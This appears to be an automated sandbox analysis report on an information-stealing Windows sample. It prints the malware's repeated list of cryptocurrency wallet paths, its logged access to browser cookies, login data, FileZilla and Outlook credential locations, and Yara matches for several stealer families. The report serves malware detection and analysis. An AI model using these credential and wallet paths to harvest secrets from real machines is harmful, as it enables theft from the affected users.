Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: u5c4.0.exe, 00000001.00000002.2499988757.0000000004340000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 18.2.MSBuild.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cmd.exe.60900c8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.cmd.exe.5dd00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cmd.exe.60900c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.cmd.exe.5dd00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2374551290.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2139879271.0000000006090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2374844469.0000000000822000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: u5c4.0.exe PID: 416, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 7216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 1524, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\pasb, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\khjsru, type: DROPPED

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 1.2.u5c4.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.u5c4.0.exe.4300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.u5c4.0.exe.42d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.u5c4.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.u5c4.0.exe.4300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.u5c4.0.exe.42d0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected PureLog Stealer
Source: Yara match File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f7ae0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f7ae0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f79a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f79a0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.3041772140.00000240F7AE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3036570950.00000240F79A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2126631376.00000240F198B000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.2126631376.00000240F4B8B000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
Yara detected RedLine Stealer
Source: Yara match File source: 18.2.MSBuild.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cmd.exe.60900c8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.cmd.exe.5dd00c8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.cmd.exe.60900c8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.cmd.exe.5dd00c8.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2374551290.0000000005DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2139879271.0000000006090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2374844469.0000000000822000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cmd.exe PID: 7216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 8068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 1524, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\pasb, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\khjsru, type: DROPPED
Yara detected Stealc
Source: Yara match File source: 00000001.00000002.2500095496.000000000436A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: u5c4.0.exe PID: 416, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 1.2.u5c4.0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.u5c4.0.exe.4300000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.u5c4.0.exe.42d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.u5c4.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.u5c4.0.exe.4300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.u5c4.0.exe.42d0e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.1743780115.0000000004300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2496868143.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2499937738.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: u5c4.0.exe PID: 416, type: MEMORYSTR
Yara detected zgRAT
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a1537d.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d4d525.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a247a3.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d7432f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f1a34dad.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.240f4d98739.5.raw.unpack, type: UNPACKEDPE
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
